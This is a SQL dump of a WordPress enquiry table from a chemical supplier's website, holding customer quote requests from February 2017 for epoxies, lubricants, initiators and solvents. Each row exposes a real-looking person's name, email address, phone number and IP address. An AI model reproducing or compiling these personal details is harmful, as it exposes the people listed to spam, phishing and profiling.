INSERT INTO `wp_enquiry_detail_new` VALUES (498, 'Kaitlin Schneider', 'kaitlin.schneider212@gmail.com', 'Hello. Can you please email me a price quote for 1 quart of Heloxy 62? \n\nThank you, \n\nKaitlin', '', 'price quote for 1 quart of Heloxy 62', '140.32.183.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1216";s:5:"title";s:12:"HELOXY™ 62";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/HELOXY-62.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 15:40:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (499, 'Kaitlin Schneider', 'kaitlin.schneider212@gmail.com', 'Hello. Can you please send me a price quote for 1 quart of EPON 58034? Thank you! ', '', 'price quote for EPON 58034', '140.32.183.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"994";s:5:"title";s:13:"EPON™ 58034";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIN-58034.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 15:41:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (500, 'Kaitlin Schneider', 'kaitlin.schneider212@gmail.com', 'Hello. Can you please send me a price quote for 1 quart of EPON 58005? Thank you! ', '', 'price quote for EPON 58005', '140.32.183.252', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"977";s:5:"title";s:13:"EPON™ 58005";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-58005.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 15:42:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (501, 'Gary Lynch', 'glynch@bestproto.net', 'ASAP', '', 'RFQ', '74.93.77.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 18:56:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (502, 'frank', 'frank.farzan@jpl.nasa.gov', 'please send me a quote and availablity', '818393-6456', 'MS-143TE', '137.79.219.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 21:57:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (503, 'Dusty Aydell', 'Daydell@claymarconstruction.com', 'I am needing to get a price and delivery on 1 gallon of Vertrel MCA  to be delivered to Air Liquide in Plaquemine Louisiana in the early part of next week. PLease send a quote over or feel free to give me a call.  Thank You.', '225445-4525', 'Vertrel MCA 1 Gallon Quote', '70.196.129.114', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 23:28:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (504, 'Mark Vidal', 'performanceup@hotmail.com', 'I\'m looking for price on a 5 gallon(20 litre) pail of this mold release.  Is a litre sample available for testing?', '1250-395-1118', 'Polyurethane elastomer', '207.102.48.84', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"293";s:5:"title";s:13:"ReleaSys 8500";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Tire-releasys-8500.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-10 23:44:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (505, 'Joel Montague', 'joel_camen@yahoo.com', 'Can you provide pricing for small quantities (quart to 5 gal if available in such small quantities', '434352-9181', 'Krytox GPL 106', '67.45.112.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"441";s:5:"title";s:7:"GPL 106";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:91:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease-pfpe.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-11 06:42:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (506, 'Joel Montague', 'joel_camen@yahoo.com', 'Can you provide pricing for minimal sample purchase?', '', '', '67.45.112.186', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1088";s:5:"title";s:7:"GPL 246";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-11 06:45:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (507, 'YADAN', 'AVION@AVIONENT.COM', 'KINDLY QUOTE YOUR BEST PRICE AND AVAILABILITY ', '+971505015406', 'RFQ', '86.98.196.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"644";s:5:"title";s:5:"240AC";s:5:"price";s:0:"";s:5:"quant";s:1:"9";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_125931485.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-12 06:57:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (508, 'PASCU ADRIAN', 'adi5pascu@yahoo.com', 'I am interesting to buy 1 kg', '+40722765245', 'VAZO 64 RADICAL INITIATOR', '86.124.83.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"427";s:5:"title";s:7:"VAZO 64";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VAZO-64-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-13 14:16:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (509, 'Jim Rivera', 'jriver01@mesacc.edu', 'Hi I am a computer tech at Mesa Community college I am wondering if by chance you have samples of this product. I am interested in it. \nalso any info on this also as well as prices for it would be great  \nI can be reached via email the phone during business hrs 7 am -3pm  Arizona time', '480654-7893', 'Sample?', '140.198.179.189', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1292";s:5:"title";s:23:"MS-530N Contact Re-Nu®";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/contact-cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-13 15:21:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (510, 'TOM CONNOLLY', 'tom.connolly@meas-spec.com', 'Can you provide a quote or advise a distributor for 1 quart of MS-111? \nIs there a neutralizing agent that you can recommend after use?', '949600-5198', 'rfq', '198.137.214.33', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-13 23:13:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (511, 'Robbie Valentine', 'm3atwad@gmail.com', 'Hello,\nI\'m testing release agents to find one to use with a mold for production.  This was recommended: MILLER STEPHENSON PTFE Release Agent Dry Lubricant MS-122DF.\n\nIs the MS-122DF correct or a typo?  I can\'t find the DF version.  Is this AD version the same?  Is it possible to request a sample of this from you guys?  If not what would be the price for a single can to test out?\n\nThanks,\nRobbie', '256244-4091', 'Testing release agents with mold', '174.65.10.151', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 05:32:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (512, 'Marvin Rosenberry', 'marvin.rosenberry@manitowoc.com', 'Please provide price list for 12 Pcs. or more.', '717593-2195', 'Price ', '208.17.195.11', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1712";s:5:"title";s:31:"Surface PrepClean™ MS-255/257";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-255.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 13:05:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (513, 'Marvin Rosenberry', 'marvin.rosenberry@manitowoc.com', 'Please provide price list for 12 Pcs. or more.', '717593-2195', '', '208.17.195.11', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1711";s:5:"title";s:26:"PFPE Re-Move™ MS 250/252";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-250.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 13:06:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (514, 'Marvin Rosenberry', 'marvin.rosenberry@manitowoc.com', 'Please provide price list for 12 Pcs. or more.', '', '', '208.17.195.11', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1706";s:5:"title";s:10:"MS-720/722";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-720.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 13:15:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (515, 'Jim Blubello', 'jimblubello@hotmail.com', 'I am interested about the cost of the two-part epoxy adhesive product.\n\nThank You', '610955-4385', 'Price inquiry', '72.94.85.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 15:46:33', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (516, 'Mychal Spencer', 'mps297@psu.edu', 'Quote for 1 gallon of Epon 862.', '360852-3821', 'Epon 862', '130.203.233.203', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"887";s:5:"title";s:11:"EPON™ 862";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-862.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 15:53:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (517, 'RWM', 'kbenton@rwmcasters.com', 'What is the price for 0.8kg cartridge?\n', '704866-8533', 'Krytox eg2000', '66.193.5.234', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"967";s:5:"title";s:7:"EG 2000";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Krytox-electronic-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 18:04:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (518, 'Roy Walcott', 'roy.walcott@owenscorning.com', 'Looking to restock resin supply ', '740221-4586', 'Price on Resin 8115c', '205.204.3.225', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"910";s:5:"title";s:12:"EPON™ 815C";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-815C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 19:42:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (519, 'Patrick Terrizzi', 'patrick@graphenetechnologies.com', 'Hi\nWould like to know price and availability of  5 gal.  pail of Epon 828. We are in SF bay Area.\nThanks!', '415883-7147', 'Epon 828', '73.241.33.80', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-14 22:10:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (520, 'debbie gebo', 'debbie@spinnakercontract.com', 'I am in need of a qoute for 3  5 and 13 units of the ms-740n', '603286-4366', 'ms-470n', '72.71.224.79', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"190";s:5:"title";s:7:"MS-470S";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470S.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-15 12:28:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (521, 'Matthew Bratcher', 'matthew.s.bratcher6.civ@mail.mil', 'Can you please provide a quote for  approximately 150 kilograms of EPON 825.   Please include shipping and availability.\n Thank you', '', '', '128.63.162.93', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"842";s:5:"title";s:11:"EPON™ 825";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-825.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-15 19:39:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (522, 'Andy Johnson', 'andy.johnson@sdi.com', 'What would be the price for 65 drums of Sion used on an annual basis?', '901399-1568', 'Pricing', '208.87.239.180', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-15 20:28:46', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (523, 'Kai Chen', 'chenkai900311@gmail.com', 'Dear Sir/Madam,\n\nI would like to get a quote of Vazo 52 initiator. The amount I need is just about 25 - 50 grams. \n\nThank you.', '614440-9569', 'Price quote for Vazo 52 initiator', '128.146.122.15', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-15 23:15:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (524, 'Kerstin Su', 'Su@murataroll.com', 'Dear Sir or Madam,\n\nWe would like to coat some mechanical parts with MS 143TE red, a product from Miller Stephenson. Could you please send the TDS of 143TE to me, cause I didn\'t find the detail instruction how we apply this kind of material. Shall we cure the coating under high temperature, just like other PTFE material? \n\nEven better, if you could share the info about the sales representative in Asia to me. Thank you.\n\nBest wishes, \n\nKerstin Su', '+8613671804331', 'About MS 143TE red', '117.136.8.76', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"303";s:5:"title";s:8:"MS-143TE";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143TE.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-16 00:30:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (525, 'Jeff Roberto', 'jeffroberto@valcor.com', 'Need quote for cleaning ', '201787-8940', 'RFQ for Vertrel MCA', '23.24.72.165', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1263";s:5:"title";s:11:"Vertrel MCA";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-16 14:13:45', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (526, 'Perry Bertolas', 'perry.bertolas@generac.com', 'Looking to buy a case of MS-580', '262544-4811', 'MS-580', '66.162.235.30', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1705";s:5:"title";s:12:"MS-580N/582N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-580N.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-16 15:46:57', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (527, 'Jay Lippold', 'jaylippold@rocketmail.com', 'I* Believe IN Dupont Teflon, Have Used iT iN Manuel Transmissions Befor, iT Made The Shifting So Much Smoother With Less Heat Overall. I Am Hopeing You GuY\'s Can Help Me and My Friends Also, Thank"U"very Very Much, JayLippold/Friends', '', 'Motorcycle Gear Box Oil  10-40 or 40 sae', '173.244.111.142', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1001";s:5:"title";s:6:"XP 1A7";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:93:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-11.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 02:11:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (528, 'mjoyner', 'mjoyner@mschem.com', 'hello', '203743-4447', 'Hello', '24.63.154.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 14:41:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (529, 'Frances Newnham', 'fnewnham@cronoseng.com', 'This product would be used on PCB that is outside in all weather conditions.', '561329-8700', 'Data sheet and price', '97.104.76.137', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 15:14:16', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (530, 'Mason Lin', 'mason.lin@medtronic.com', 'My name is Mason Lin, and I work at Medtronic in North Haven, CT. We are looking into replacing the current seal lubricant we use with a new substance, and we are interested in testing a sample of the MS 122 Dry Lubricant in our design as a potential replacement. If you could send a sample of the substance to the North Haven Medtronic facility, that would be greatly appreciated. ', '443534-4886', 'MS 122 Dry Lubricant Sample', '216.75.211.7', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:8:"MS-122AD";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 16:01:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (531, 'Adam Smeltz', 'asmeltz@ce3s.com', 'How long of Shelf-Life does the MS-260 product have? ', '717232-9715', 'Shelf_Life', '108.11.193.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 16:21:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (532, 'Joel Persels', 'jpersels@ngs.org', 'Hello,\nPlease provide me with a quote for 20 cans of your MS-260 product. The shipping zip code is 20036.\n\nThank you!', '410703-3721', 'price quote', '206.136.32.239', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:2:"20";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 16:55:29', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (533, 'Ashley Williams', 'ashley.williams@morganplc.com', 'I am trialing using Epikure W in one of our epoxy solutions as the curing agent.  The annual volume would be 30-40 drums (55 gallon drums).  I am interested in obtaining a sample as well as a price quote on this quantity.  Thanks.', '864284-4671', 'Epikure W Sample Request', '199.116.175.107', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 19:57:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (534, 'David Lemme', 'david.lemme@janicki.com', 'Hello,\n\nI was wondering what the availability and price of Quik-Freeze Antistatic (MS-242N-AS) and Quik-Freeze (MS-242N).  Thank you!\n\nDavid', '360814-1855', 'Availability and Price', '216.243.30.3', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1726";s:5:"title";s:24:"Antistatic Quik-Freeze®";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:88:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze-anti-static.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-17 21:22:09', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (535, 'Kurt Nordstrom', 'kurt.e.nordstrom@gmail.com', 'What is your price for 1kg of Krytox GPL 100 oil?', '940239-0500', 'Krytox GPL 100', '71.163.115.199', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"421";s:5:"title";s:7:"GPL 100";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-18 22:53:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (536, 'Russell Varley', 'russell.varley@deakin.edu.au', 'Can you please provide me with a quote for supplying about 1-2 kg of Curing agent W to Geelong, Australia. thanks Russell', '+61354279577', 'Curing Agent W', '210.84.15.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1059";s:5:"title";s:12:"EPIKURE™ W";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-W-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-19 11:49:03', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (537, 'PASCU ADRIAN', 'adi5pascu@yahoo.com', 'I need a small quantity', '+40214101481', 'To buy ', '86.124.83.60', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"568";s:5:"title";s:7:"VAZO 52";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-pca-oil.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-02-20 10:11:48', '', NULL, '', '', '', NULL, '', ''); 
